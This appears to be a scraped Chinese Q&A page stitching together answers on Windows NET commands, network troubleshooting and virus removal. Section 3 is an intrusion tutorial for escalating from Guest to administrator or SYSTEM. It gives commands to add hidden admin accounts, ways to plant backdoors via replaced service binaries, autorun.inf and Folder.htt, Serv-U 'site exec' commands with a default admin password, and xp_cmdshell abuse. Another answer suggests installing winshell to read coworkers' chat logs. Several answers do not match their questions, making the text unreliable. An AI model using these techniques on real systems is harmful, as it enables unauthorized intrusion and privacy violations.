導航:首頁 > 文件處理 > winshell文件夾

winshell文件夾

發布時間:2022-12-10 07:28:27

1. 在windows中用shell遍歷一個文件夾下得所有文件並對文件執行同一個指令

你的for循環中循環的是$PATH ,他只是代表這個路徑,並不表示裡面的文件名。

2. 常用的幾條NET命令高手給介紹幾條

以下有很多,常用的有net use,net user,net time,net stop/start 等
3)NET USE

作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。

命令格式:net use [devicename | *] [\\computername\sharename[\volume> [password | *> [/user:[domainname\]username]

參數介紹:

鍵入不帶參數的net use列出網路連接。

devicename指定要連接到的資源名稱或要斷開的設備名稱。 \\computername\sharename伺服器及共享資源的名稱。

password訪問共享資源的密碼。

*提示鍵入密碼。 /user指定進行連接的另外一個用戶。

domainname指定另一個域。

username指定登錄的用戶名。

/home將用戶連接到其宿主目錄

/delete取消指定網路連接。

/persistent控制永久網路連接的使用。

簡單事例:

<1>net use e: \\YFANG\TEMP將\\YFANG\TEMP目錄建立為E盤

<2>net use e: \\YFANG\TEMP /delete斷開連接

(4)NET TIME

作 用:使計算機的時鍾與另一台計算機或域的時間同步。

命令格式:net time [\\computername | /domain[:name> [/set]

參數介紹:

<1>\\computername要檢查或同步的伺服器名。

<2>/domain[:name]指定要與其時間同步的域。

<3>/set使本計算機時鍾與指定計算機或域的時鍾同步。

下面的這4個參數是相關的,所以一起介紹

(5)Net Start

作 用:啟動服務,或顯示已啟動服務的列表。

命令格式:net start service

(6)Net Pause

作 用:暫停正在運行的服務。

命令格式:net pause service

(7)Net Continue

作 用:重新激活掛起的服務。

命令格式:net continue service

(8)NET STOP

作 用:停止 Windows NT 網路服務。

命令格式:net stop service

參數介紹:我們來看看這些服務都是什麼

<1>alerter(警報)

<2>client service for netware(Netware 客戶端服務)

<3>clipbook server(剪貼簿伺服器)

<4>computer browser(計算機瀏覽器)

<5>directory replicator(目錄復制器)

<6>ftp publishing service (ftp )(ftp 發行服務)

<7>lpdsvc

<8>net logon(網路登錄) <9>network dde網路 dde)

<10>network dde dsdm(網路 dde dsdm)

<11>network monitor agent(網路監控代理)

<12>nt lm security support provider(NT LM 安全性支持提供)

<13>ole(對象鏈接與嵌入)

<14>remote access connection manager(遠程訪問連接管理器)

<15>remote access isnsap service(遠程訪問 isnsap 服務)

<16>remote access server(遠程訪問伺服器)

<17>remote procere call (rpc) locator(遠程過程調用定位器)

<18>remote procere call (rpc) service(遠程過程調用服務)

<19>schele(調度)

<20>server(伺服器)

<21>simple tcp/ip services(簡單 TCP/IP 服務)

<22>snmp

<23>spooler(後台列印程序)

<24>tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)

<25>ups (26)workstation(工作站)

<27>messenger(信使)

<28>dhcp client

<29>eventlog 以下這些SERVICE只能在NT SERVER上使用

<< 1>>)file server for macintosh

<<2>>gateway service for netware

<<3>>microsoft dhcp server

<<4>>print server for macintosh

<<5>>remoteboot

<<6>>windows internet name service

(9)Net Statistics

作 用:顯示本地工作站或伺服器服務的統計記錄。

命令格式:net statistics [workstation | server]

參數介紹:

<1>鍵入不帶參數的net statistics列出其統計信息可用的運行服務。 <2>workstation顯示本地工作站服務的統計信息。

<3>server顯示本地伺服器服務的統計信息。

簡單事例:

<1>net statistics server | more顯示伺服器服務的統計信息

(10)Net Share

作 用:創建、刪除或顯示共享資源。

命令格式:net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]

參數介紹:

<1>鍵入不帶參數的net share顯示本地計算機上所有共享資源的信息。

<2>sharename是共享資源的網路名稱。

<3>drive:path指定共享目錄的絕對路徑。

<4>/users:number設置可同時訪問共享資源的最大用戶數。

<5>/unlimited不限制同時訪問共享資源的用戶數。

<6>/remark:"text "添加關於資源的注釋,注釋文字用引號引住。

簡單事例:

<1>net share mylove=c:\temp /remark:"my first share"以mylove為共享名共享C:\temp

<2>net share mylove /delete停止共享mylove目錄

(11)Net Session

作 用:列出或斷開本地計算機和與之連接的客戶端的會話,也可以寫為net sessions或net sess。

命令格式:net session [\\computername] [/delete]

參數介紹:

<1>鍵入不帶參數的net session顯示所有與本地計算機的會話的信息。

<2>\\computername標識要列出或斷開會話的計算機。

<3>/delete結束與\\computername計算機會話並關閉本次會話期間計算機的所有?

簡單事例:

<1>net session \\YFANG要顯示計算機名為YFANG的客戶端會話信息列表。

(12)Net Send

作 用:向網路的其他用戶、計算機或通信名發送消息。

命令格式:net send {name | * | /domain[:name] | /users} message 參數介紹:

<1>name要接收發送消息的用戶名、計算機名或通信名。

<2>*將消息發送到組中所有名稱。

<3>/domain[:name]將消息發送到計算機域中的所有名稱。

<4>/users將消息發送到與伺服器連接的所有用戶。

<5>message作為消息發送的文本。

簡單事例:

<1>net send /users server will shutdown in 5 minutes. 給所有連接到伺服器的用戶發送消息

(13)Net Print

作 用:顯示或控制列印作業及列印隊列。

命令格式:net print [\\computername ] job# [/hold | /release | /delete]

參數介紹:

<1>computername共享列印機隊列的計算機名。

<2>sharename列印隊列名稱。

<3>job#在列印機隊列中分配給列印作業的標識號。

<4>/hold使用 job# 時,在列印機隊列中使列印作業等待。

<5>/release釋放保留的列印作業。

<6>/delete從列印機隊列中刪除列印作業。

簡單事例:

<1>net print \\YFANG\SEEME列出\\YFANG計算機上SEEME列印機隊列的目錄

(14)Net Name

作 用:添加或刪除消息名(有時也稱別名),或顯示計算機接收消息的名稱列表。

命令格式:net name [name [/add | /delete>

參數介紹:

<1>鍵入不帶參數的net name列出當前使用的名稱。

<2>name指定接收消息的名稱。

<3>/add將名稱添加到計算機中。

<4>/delete從計算機中刪除名稱。

(15)Net Localgroup

作 用:添加、顯示或更改本地組。

命令格式:net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]

參數介紹:

<1>鍵入不帶參數的net localgroup顯示伺服器名稱和計算機的本地組名稱。

<2>groupname要添加、擴充或刪除的本地組名稱。

<3>/comment: "text "為新建或現有組添加註釋。

<4>/domain在當前域的主域控制器中執行操作,否則僅在本地計算機上執行操作?

<5>name [ ...]列出要添加到本地組或從本地組中刪除的一個或多個用戶名或組名。

<6>/add將全局組名或用戶名添加到本地組中。

<7>/delete從本地組中刪除組名或用戶名。

簡單事例:

<1>net localgroup love /add將名為love的本地組添加到本地用戶帳號資料庫

<2>net localgroup love顯示love本地組中的用戶

(16)Net Group

作 用:在 Windows NT Server 域中添加、顯示或更改全局組。

命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain]

參數介紹:

<1>鍵入不帶參數的net group顯示伺服器名稱及伺服器的組名稱。

<2>groupname要添加、擴展或刪除的組。

<3>/comment:"text "為新建組或現有組添加註釋。 <4>/domain在當前域的主域控制器中執行該操作,否則在本地計算機上執行操作?

<5>username[ ...]列表顯示要添加到組或從組中刪除的一個或多個用戶。

<6>/add添加組或在組中添加用戶名。

<7>/delete刪除組或從組中刪除用戶名。

簡單事例:

<1>net group love yfang1 yfang2 /add將現有用戶帳號yfang1和yfang2添加到本地計算機的love組

(17)Net File

作 用:顯示某伺服器上所有打開的共享文件名及鎖定文件數。

命令格式:net file [id [/close>

參數介紹:

<1>鍵入不帶參數的net file獲得伺服器上打開文件的列表。

<2>id文件標識號。

<3>/close關閉打開的文件並釋放鎖定記錄。

(18)Net Config

作 用:顯示當前運行的可配置服務,或顯示並更改某項服務的設置。

命令格式:net config [service [options>

參數介紹:

<1>鍵入不帶參數的net config顯示可配置服務的列表。

<2>service通過net config命令進行配置的服務(server或workstation)

<3>options服務的特定選項。

(19)Net Computer

作 用:從域資料庫中添加或刪除計算機。

命令格式:net computer \\computername {/add | /del}

參數介紹:

<1>\\computername指定要添加到域或從域中刪除的計算機。

<2>/add將指定計算機添加到域。

<3>/del將指定計算機從域中刪除。

簡單事例:

<1>net computer \\cc /add將計算機 cc 添加到登錄域

(20)Net Accounts

作 用:更新用戶帳號資料庫、更改密碼及所有帳號的登錄要求。

命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]

參數介紹:

<1>鍵入不帶參數的net accounts顯示當前密碼設置、登錄時限及域信息。

<2>/forcelogoff:{minutes | no}設置當用戶帳號或有效登錄時間過期時

<3>/minpwlen:length設置用戶帳號密碼的最少字元數。

<4>/maxpwage:{days | unlimited}設置用戶帳號密碼有效的最大天數。

<5>/minpwage:days設置用戶必須保持原密碼的最小天數。

<6>/uniquepw:number要求用戶更改密碼時,必須在經過number次後才能重復使用 與之相同的密碼。

<7>/domain在當前域的主域控制器上執行該操作。 <8>/sync當用於主域控制器時,該命令使域中所有備份域控制器同步

簡單事例:

<1>net accounts /minpwlen:7

將用戶帳號密碼的最少字元數設置為7

----------------------上面介紹的是NET命令在WINNT下的基本用法

----------------------下面我們看看NET命令在WIN98下的基本用法

在WIN98中NET命令也有一些參數 其中有一些參數的名字和功能及簡單的使用方法和WINNT下的相應的參數的用法相同

其中有

(1)NET TIME命令

(2)NET PRINT命令

(3)NET USE命令

(4)NET VIEW命令

在WIN98中NET命令有一些參數 其中有一些參數的名字和WINNT下的相應的參數的名字相同但其用法卻有些不同

其中有

(1)NET START

作 用:啟動相應的服務。(不能在DOS-WIN中用)

命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK] [/LIST] [/YES] [/VERBOSE]

(2)NET STOP

作 用:停止相應的服務.(不能在DOS-WIN中用)

命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES]

在WIN98中NET命令還有一些參數是在98下才有的

其中有

(1)NET DIAG

作 用:運行MS的DIAGNOSTICS程序顯示網路的DIAGNOSTIC信息

命令格式:NET DIAGNOSTICS [/NAMES | /STATUS]

(2)NET INIT

作 用:不通過綁定來載入協議或網卡驅動(不能在DOS-WIN中用)

命令格式:NET INITIALIZE [/DYNAMIC]

(3)NET LOGOFF

作 用:斷開連接的共享資源(不能在DOS-WIN中用)

(4)NET LOGON

作 用:在WORKGROUP中登陸(不能在DOS-WIN中用)

命令格式:NET LOGON [user [password | ?> [/DOMAIN:name] [/YES] [/SAVEPW:NO]

(5)NET PASSWORD

作 用:更改你的網路登陸口令(不能在DOS-WIN中用)

命令格式:NET PASSWORD \\computer | /DOMAIN:name [user [oldpassword [newpassword>]
回答者:fuping111 - 首席運營官 十二級 3-21 09:56

提問者對於答案的評價:
謝謝
評價已經被關閉 目前有 0 個人評價

50% (0) 不好
50% (0)

其他回答共 1 條
NET HELP
command
-或-
NET command /HELP

Commands available are:

NET ACCOUNTS NET HELP NET SHARE
NET COMPUTER NET HELPMSG NET START
NET CONFIG NET LOCALGROUP NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
NET CONTINUE NET PRINT NET USE
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW

NET HELP SERVICES 列出你可以啟動的網路服務。
NET HELP SYNTAX 解釋如何讀取 NET HELP 語法行。
NET HELP command | MORE 會以一次一個螢幕的方式顯示說明

3. 破解GUEST許可權

呵呵,給你這點東西,很有用的。

GUEST帳號默認是沒有許可權創建一個管理員帳號的。可是偏偏就有這么一個方法讓其當了回「老大」,簡單幾步就奪下了系統的最高許可權。這其中的大概原理也很簡單,由於Windows XP在登錄前會自動完成一系列腳本的運行,我們可在GUEST帳戶下利用組策略來創建一個新建管理員帳號的腳本,使系統優先執行它即可。

步驟1:打開記事本,在其中輸入如下命令:

net user netfriends 123456 /add
net localgroup administrators netfriends /add

命令解釋:這里的netfriends是我們要創建的系統管理員帳戶名,123456為其密碼,將其保存為批處理文件,比如「netfriends.bat」。
如果你不想這樣做的話,還有這個呢。
Guest許可權提升方法總結:
現在的入侵是越來越難了,人們的安全意識都普遍提高了不少,連個人用戶都懂得防火牆,殺毒軟體要裝備在手,對於微軟的補丁升級也不再是不加問津。因此現在我們想在網際網路上掃描弱口令的主機已經幾乎是痴心妄想了。(這可是一件大大的好事啊。)
但是這也使得我們作黑客的進行入侵檢測達到了一個前所未有的難度。通過各種手段,我們通常並不能直接獲得一個系統的管理員許可權。比如我們通過某些對IIS的攻擊,只能獲得IUSR-MACHINENAME的許可權(如上傳asp木馬,以及某些溢出等)。這個帳號通常可是系統默認的guest許可權,於是,如何拿到系統管理員或者是system許可權,便顯得日益重要了。
於是,我就總結了一下大家所經常使用的幾種提升許可權的方法,以下內容是我整理的,沒有什麼新的方法,寫給和我一樣的菜鳥看的。高手們就可以略去了,當然,你要復習我不反對,順便幫我查查有什麼補充與修改:
1、社會工程學。
對於社會工程學,我想大家一定不會陌生吧?(如果你還不太明白這個名詞的話,建議你去找一些相關資料查查看。)我們通常是通過各種辦法獲得目標的敏感信息,然後加以分析,從而可以推斷出對方admin的密碼。舉一個例子:假如我們是通過對伺服器進行資料庫猜解從而得到admin在網站上的密碼,然後藉此上傳了一個海洋頂端木馬,你會怎麼做?先翻箱倒櫃察看asp文件的代碼以希望察看到連接SQL的帳號密碼?錯錯錯,我們應該先鍵入一個netstat –an命令察看他開的埠(當然用net start命令察看服務也行)。一旦發現他開了3389,猶豫什麼?馬上拿出你的終端連接器,添上對方IP,鍵入你在他網站上所獲得的用戶名及密碼……幾秒之後,呵呵,進去了吧?這是因為根據社會工程學的原理,通常人們為了記憶方便,將自己在多處的用戶名與密碼都是用同樣的。於是,我們獲得了他在網站上的管理員密碼,也就等同於獲得了他所有的密碼。其中就包括系統admin密碼。於是我們就可以藉此登入他的3389拉!
即使他並沒有開啟3389服務,我們也可以憑借這個密碼到他的FTP伺服器上試試,如果他的FTP伺服器是serv-u 5.004 以下版本,而帳號又具有寫許可權,那麼我們就可以進行溢出攻擊了!這可是可以直接拿到system許可權的哦!(利用serv-u還有兩個提升許可權的方法,
我待會兒會說的)
實在不行,我們也可以拿它的帳號去各大網站試試!或許就能進入他所申請的郵箱拿到不少有用的信息!可以用來配合我們以後的行動。
還有一種思路,我們知道,一個網站的網管通常會將自己的主頁設為IE打開後的默認主頁,以便於管理。我們就可以利用這一點,將他自己的主頁植上網頁木馬……然後等他打開IE……呵呵,他怎麼也不會想到自己的主頁會給自己種上木馬吧?
其實利用社會工程學有很多種方法,想作為一個合格黑客,這可是必學的哦!多動動你自己的腦子,你才會成功!
2、本地溢出。
微軟實在是太可愛了,這句話也不知是哪位仁兄說的,真是不假,時不時地就會給我們送來一些溢出漏洞,相信通過最近的MS-0011大家一定又賺了一把肉雞吧?其實我們在拿到了Guest許可權的shell後同樣可以用溢出提升許可權。最常用的就是RunAs.exe、 winwmiex.exe 或是PipeUpAdmin等等。上傳執行後就可以得到Admin許可權。但一定是對方沒有打過補丁的情況下才行,不過最近微軟的漏洞一個接一個,本地提升許可權的exploit也會出來的,所以大家要多多關心漏洞信息,或許下一個exploit就是你寫出來的哦!
3、利用scripts目錄的可執行許可權。
這也是我們以前得到webshell後經常使用的一招,原理是Scripts目錄是IIS下的可運行目錄,許可權就是我們夢寐以求的SYSTEM許可權。常見的使用方法就是在U漏洞時代我們先上傳idq.dll到IIS主目錄下的Scripts目錄,然後用ispc.exe進行連接,就可以拿到system許可權,不過這個是在Microsoft出了SP3之後就行不通了,其實我們仍可以利用此目錄,只要我們上傳別的木馬到此目錄,我舉個例子就比如是winshell好了。然後我們在IE中輸入:
http://targetIP/Scripts/木馬文件名.exe
等一會,看到下面進度條顯示「完成」時,可以了,連接你設定的埠吧!我這里是默認的5277,連接好後就是SYSTEM許可權了!這時你要干什麼我就管不著了……嘿嘿
4、替換系統服務。
這可是廣大黑友樂此不疲的一招。因為windows允許對正在運行中的程序進行改動,所以我們就可以替換他的服務以使得系統在重啟後自動運行我們的後門或是木馬!首先,通過你獲得的guest許可權的shell輸入:net start命令,察看他所運行的服務。此時如果你對windows的系統服務熟悉的話,可以很快看出哪些服務我們可以利用。
C:WINNTSystem32>net start
已經啟動以下 Windows 服務:
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Logical Disk Manager Administrative Servic
Network Connections
Network Location Awareness (NLA)
Protected Storage
Remote Procere Call (RPC)
Rising Process Communication Center
Rising Realtime Monitor Service
Secondary Logon
Security Accounts Manager
Shell Hardware Detection
System Event Notification
System Restore Service
Telephony
Themes
Upload Manager
WebClient
Windows Audio
Windows Image Acquisition (WIA)
Windows Management Instrumentation
Windows Time
Wireless Zero Configuration
Workstation
命令成功完成。

CCenter.exe,而Rising Realtime Monitor Service服務調用的是RavMonD.exe。這些都是第三方服務,可以利用。(強烈推薦替換第三方服務,而不要亂動系統服務,否則會造成系統不穩定)於是我們搜索這兩個文件,發現他們在D: risingrav文件夾中,此時注意一點:如果此文件是在系統盤的Program Files目錄中時,我們要知道,如果對方是使用的NTFS格式的硬碟,那麼系統盤下的這個文件夾guest許可權是默認不可寫的,還有Windows目錄、Documents and Settings目錄這些都是不可寫的,所以我們就不能替換文件,只能令謀途徑了。(這也是為什麼我不建議替換系統服務的原因之一,因為系統服務文件都在WindowsSystem32目錄中,不可寫)但如果是FAT32格式就不用擔心,由於它的先天不足,所有文件夾都是可寫的。
於是就有人會問:如果是NTFS格式難道我們就沒轍了嗎?
當然不是,NTFS格式默認情況下除了對那三個文件夾有限制外,其餘的文件夾、分區都是everyone完全控制。(也就是說我即使是IPC$的匿名連接,都會對這些地方有可寫可運行許可權!)所以一旦對方的第三方服務不是安裝在那三個文件夾中,我們就可以替換了!我就拿CCenter下手,先將它下載到本地機器上(FTP、放到IIS主目錄中再下載等等……)然後拿出你的文件捆綁機,找到一個你最拿手的後門……呵呵,捆綁好後,上傳,先將對方的CCenter.exe文件改個名CCENTBAK.exe,然後替換成自己的CCenter。現在只需要等對方的機器重啟,我們的後門就可以運行了!由於Windows系統的不穩定,主機在一個禮拜後就會重啟,(當然如果你等不及的話,可以對此伺服器進行DDOS攻擊迫使他重啟,但我並不贊同!)此時登上你的後門,就是System許可權了!
5、替換admin常用程序。
如果對方沒有你所能利用的服務,也可以替換對方管理員常用的程序,例如QQ,MSN等等,具體替換方法與替換服務一樣,只是你的後門什麼時候可以啟動就得看你的運氣了。
6、利用autorun .inf或desktop.ini。
我們常會碰到這種事:光碟放進光碟機,就會自動跳出來一段FLASH,這是為什麼?呵呵,你到光碟的根目錄中看看,是否有一個autorun.inf的文件?用記事本打開來看看,是不是有這么一句話:autorun=xxx.exe 這就是你剛才所看到的自動運行的程序了。
於是我們就可以利用這個來提升我們的許可權。先配置好一個後門,(我常用的是winshell,當然你不用這個也行)上傳到他D盤下的任意一個文件夾中,然後從你那個自運行的光碟中把autorun.inf文件也上傳,不過上傳前先將autorun=xxx.exe 後面的xxx.exe改為你配置的後門文件途徑、文件名,然後再上傳到d盤根目錄下,加上只讀、系統、隱藏屬性。OK就等對方admin瀏覽D盤,我們的後門就可以啟動了!(當然,這必須是在他沒有禁止自動運行的情況下才行。)
另外有相同作用的是desktop.ini。大家都知道windows支持自定義文件,其實它就是通過在文件夾中寫入特定文件——desktop.ini與Folder.htt來實現的,我們就可以利用修改這文件來達到我們的目的。
首先,我們現在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇「自定義文件夾」(xp好像是不行的)一直下點,默認即可。完成後,你就會看到在此目錄下多了兩個名為Folder setting的文件架與desktop.ini的文件,(如果你看不到,先取消「隱藏受保護的操作系統文件」)然後我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼:
<OBJECT ID=」RUNIT」 WIDTH=0 HEIGHT=0 TYPE=」application/x-oleobject」 CODEBASE=」你的後門文件名」>
</OBJECT>
然後你將你的後門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執行了我們的後門!(如果你不放心,可以多設置幾個目錄)
7、Serv-U提升許可權
利用Serv-U提升許可權共有三種方法,溢出是第一種,我之前已經說過,這里就不介紹了。我要講的是其餘兩種辦法。
辦法一:要求:對Serv-u安裝目錄有完全控制權。
方法:進入對方的Serv-U目錄,察看他的ServUDaemon.ini,這是Serv-U的配置文件,如果管理員沒有選擇將serv- u的所有配置寫入注冊表的話,我們就可以從這個文件中看到Serv-U的所有信息,版本、IP、甚至用戶名與密碼!早些版本的密碼是不加密的,但是後來是經過了MD5加密。所以不能直接得到其密碼。不過我們仍然有辦法:先在本地安裝一個Serv-U(版本最好新點),將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重起一下Serv-U,於是你上面的所有配置都與他的一模一樣了。我們新建一個用戶,什麼組不重要,重要的是將他的主目錄改為對方的系統盤,然後加上執行許可權!這個最重要。更改完後應用,退出。再將你更改過的ServUDaemon.ini 文件上傳,覆蓋掉他的文件,然後就等他的Serv-U重啟更新配置,之後我們就可以登入他的FTP。進入後執行以下命令:
Cd windows
Cd System32
Quote site exec net.exe user wofeiwo /add
Quote site exec net.exe localgroup administrators wofeiwo /add
Bye
然後你就有了一個叫wofeiwo的系統管理員了,還等什麼?登陸3389,大功告成!
辦法二:Serv-u開了兩個埠,一個是21,也就是FTP了,而另一個是43958,這個埠是干什麼的?嘿嘿,這個是Serv-U的本地管理埠。但是默認是不準除了127.0.0.1外的ip連接的,此時就要用到FPIPE.exe文件,這是一個埠轉發程序,上傳他,執行命令:
Fpipe –v –l 3333 –r 43958 127.0.0.1
意思是將4444埠映射到43958埠上。
然後就可以在本地安裝一個Serv-u,新建一個伺服器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上後你就可以管理他的Serv-u了,之後提升許可權的方法參考辦法一。我就不贅述了。
8、SQL帳戶密碼泄露。
如果對方開了MSSQL伺服器,我們就可以通過用SQL連接器加管理員帳號,因為MSSQL是默認的SYSTEM許可權。
要求:你得到了對方MSSQL管理員密碼(可以從他的連接資料庫的ASP文件中看到),對方沒有刪除xp_cmdshell
方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass中填入你所得到的用戶名與密碼。Format選擇xp_cmdshell」%s」即可。然後點擊connect,連接上後就可以在CMD一欄中輸入你想要的CMD命令了。
唔……升個懶腰,好累阿,終於寫完8個方法了,發發牢騷……(以下省略N字元)
總之,以上的8種方法並不是絕對的,最主要的是你的思路,每種方法互相結合,才能發揮其應有的效應。

4. 排除一些網路故障的常用命令

常用命令集錦

一、 ping

網管使用最頻的當是ping命令,它不僅可以檢查網路是否連通,還有益於分析判斷網路故障。其常用方法有:

1. ping本機IP

本機始終都是應該對該ping命令作出應答,如沒有,則表示本地配置或安裝存在問題。出現此問題時,區域網用戶可斷開網纜,然後重新發送該命令:如果網線斷開後本命令正確,則表示另一機子可能配置了相同的IP地址。這里顯示的TTL(Time To Live存在時間),表示數據包已通過的路由器數量。

2. ping網關IP

命令應答如果正確,表示區域網中的網關路由器正在正常運行

3. ping遠程IP

如果收到4個應答,表示成功的使用了預設網關。對於撥號上網用戶則表示能夠成功的訪問Internet(但不排除ISP的DNS會有問題)。

4. ping區域網內其他IP

該命令將會經過網卡及網纜到達其他機器後再返回。收到回送應答表明本地網路中的網卡和載體運行正確;但若收到0個回送應答,那麼表示子網掩碼(進行子網分割時,將IP地址的網路部分與主機部分分開的代碼)不正確或網卡配置錯誤或電纜系統有問題。

5. ping localhost

localhost是系統的網路保留名,它是127.0.0.1的別名,每台機器都能將該名字轉換成該地址。

6. ping www.xxx.com(如www.sina.com)

對這個域名執行Ping www.xxx..com地址,通常是通過DNS伺服器。如果出現故障,則表示DNS伺服器的IP地址配置不正確或DNS伺服器有故障。

簡言之,如果ping運行正確,我們大體上就可以排除網路訪問層、網卡、Modem的輸入輸出線路、電纜和路由器等存在的故障,從而減小了問題的范圍。但由於可以自定義所發數據報的大小及無休止的告訴發送,ping也被某些別有用心的人作為DDOS(拒絕服務攻擊)的工具,例如許多大型的網站就是被黑客利用數百台可以告訴介入互聯網的電腦連續發送大量ping數據報而癱瘓的。

二、 Netstat

Netstat用於顯示與IP、TCP、UDP和ICMP協議相關的統計數據,一般用於檢驗本機各埠的網路連接情況。

1. netstat-s

本命令能按照各協議分別顯示其統計數據。如果我們的應用程序或瀏覽器運行速度較慢,或者不能顯示Web頁之類的數據,那麼我們就可以用本選項來查看所顯示的信息。

2. netstat-e

用於顯示乙太網統計數據。它列出了發送和接收端的數據報數量,包括傳送的數據報的總位元組數、錯誤數、刪除數、數據報的數量和廣播的數量,可用來統計基本的網流量。

3. netstat-r

可顯示路由表信息

4. netstat-a

顯示所有有效連接信息列表,包括已建立連接(ESTABLISHED)與監聽連接請求(LISTENING)的連接。

三、 IPConfig

IPConfig用於顯示當前TCP/IP配置。如果我們的機子和所在區域網使用了動態主機配置協議(DHCP),這時IPConfig可以讓我們了解自己的計算機是否成功的租用到一個IP地址,如果租用到則可以了解它目前分配到的是什麼地址。了解機器當前IP地址、子網掩碼和預設網關實際上有利於測試和分析故障。

1. ipconfig

它顯示每個已經配置的介面的IP地址、子網掩碼和預設網關值。

2. ipconfig/all

當使用all選項時,IPConfig能為DNS和WINS伺服器顯示它已經配置且所要使用的附加信息(如IP地址等),並且顯示內置於本地網卡中的物理地址(MAC)。

四、 ARP

ARP(地址轉換協議)是一個重要的TCP/IP協議,用於確定對應IP地址的網卡物理地址。ARP命令能夠查看本地或另一台計算機的ARP高速緩存中的當前內容。

1. arp-a或arp-g

用於查看高速緩存中的所有項目。

2. arp-a IP

如果我們有多個網卡,那麼使用arp-a加上介面的IP地址,就可以只顯示與該介面相關的ARP緩存項目。

五、 Tracert

如果網路連通有問題,可用tracert檢查到達的目標IP地址的路徑並記錄結果。Tracert的使用很簡單,只需要再Tracert後面跟一個IP地址或URL,Tracert一般用來檢測故障的位置,我們可以用「tracert IP」確定在哪個環節上出了問題。

六、 Route

大多數主機一般都是駐留在只連接一台路由器的網段上。由於只有一台路由器,一次不存在使用哪一台路由器將數據報發表到遠程計算機的問題,該路由器的IP地址可作為該網段上所有計算機的預設網關輸入。

但是,當網路上擁有兩個或多個路由器時,我們就不一定想只依賴預設網關了。實際上我們可能想讓我們的某些遠程IP地址通過某個特定的路由器來傳遞,而其他的遠程IP則通過另一個路由器來傳遞。Route print命令用於顯示路由表中的當前項目,在單路由器網段上的輸出。

七、 NBTStat

本命令可釋放和刷新NetBIOS名稱。運用NetBIOS,我們可以查看本地計算機或遠程計算機上的NetBIOS名字表格。

1. nbtstat-n

顯示寄存在本地的名字和服務程序。

2. nbtstat-c

用於顯示NetBIOS名字高速緩存的內容。NetBIOS名字高速緩存用於存放與本計算機最近進行通信的其他計算機的NetBIOS名字和IP地址對。

3. nbtstat-r

用於清除和重新載入NetBIOS名字高速緩存。

4. nbtstat-a IP

通過IP顯示另一台計算機的物理地址和名字列表,我們所顯示的內容就像對方計算機自己運行nbtstat-n一樣。

5. nbtstat-s IP

顯示使用其IP地址的另一台計算機的NetBIOS連接表。

八、 設置共享的命令

1. net share

查看機器的共享資源。

2. 手工刪除共享

Net share c$ /d

Net share d$ /d

Net share ipc$ /d

Net share admin$ /d

3.增加一個共享

C:net share mymovie=e:downloadsmovie/users:l

增加mymovie共享,同時限制鏈接用戶數為1人。

5. PE添加winshell

先把修改好的WinXShell(下載地址在最下面) 放到共享文件夾,有32位和64位,
然後再到SCCM控制去更新32位和64位啟動映像包,選擇對應的共享文件夾路徑更新完成即可。
再SCCM 任務序列當中 加一個運行命令行步驟 分別在32位啟動映像包和64位啟動映像包 輸入 cmd /c start x:smspkgsms10000WinXShell_x86WinXShell.exe -winpe 、 cmd /c start x:smspkgsms10000WinXShell_x64WinXShell.exe -winpe ,上面啟動映像包添加的工具都在此路徑 x:smspkgsms10000 目錄當中,接下來就可以去看下OSD任務序列進入PE圖形顯示效果了,雖然功能還是很簡陋。

一、合格的工藝工程師必須非常熟悉產品的設計、製作工藝、包裝、運輸及產品的配套使用功能;在本行業屬通才,了解所有工序工藝; 二、編制工藝流程,下生產指令單之前對產品製程工藝的核定; 三、規范與公司產品配套使用的采購產品工藝、使用功能要求,並簽樣板給供應商、品質部、采購部; 四、對新產品進行可生產性的評估,打樣評估; 五、做好預先品管,提醒生產過程及檢測時的品質注意事項。

6. 公司一個區域網內,怎麼看其他電腦里的內容,比如smn聊天記錄

安裝個winshell,然後再把內容提取出來。

7. 求lisp大神修改一個按塊分圖命令,我的這個命令是把圖紙內所有的塊都分出去,幫我改成可以選擇塊進行分圖

網上購買的虛擬主機上可以運行多個網站

但是其他的網站不能被重新綁定域名

但是您可以使用目錄來實現

比如你原來的網站是AAA級。com

B就可以訪問該目錄通過AAA.COM / B放置新網站

8. svch0st.exe怎麼清除

本文(解決方案)為劍盟反病毒成員(whzl123)原創作品,屬劍盟中國成員原創文章(解決方案),轉載請註明來源,本站保留追究法律責任的權利。

用費爾或XDE刪除下列文件:
c:\documents and settings\all users\「開始」菜單\程序\啟動\svch0st.exe
c:\documents and settings\a\「開始」菜單\程序\啟動\svch0st.exe
c:\windows\system32\winmon.exe
c:\windows\371662m.exe
c:\windows\system32\taskmonitor.exe
c:\windows\system32\drivers\xpvidpf.sys
c:\windows\system32\dllcache\ravwin.exe
c:\SVCH0ST.EXE
d:\SVCH0ST.EXE
e:\SVCH0ST.EXE
f:\SVCH0ST.EXE
c:\autorun.inf
d:\autorun.inf
e:\autorun.inf
f:\autorun.inf

2.刪除重啟後使用SREng修復下面各項:

啟動項目 -- 注冊表之如下項刪除:
[WinMon] <C:\WINDOWS\system32\WinMon.EXE>
[WinMon] <C:\WINDOWS\system32\WinMon.EXE>
[WinSysM] <; C:\WINDOWS\371662M.exe>
[WinMon] <C:\WINDOWS\system32\WinMon.EXE>
[Taskmonitor] <; C:\WINDOWS\system32\Taskmonitor.exe>

啟動項目 -- 啟動文件夾之如下項刪除:
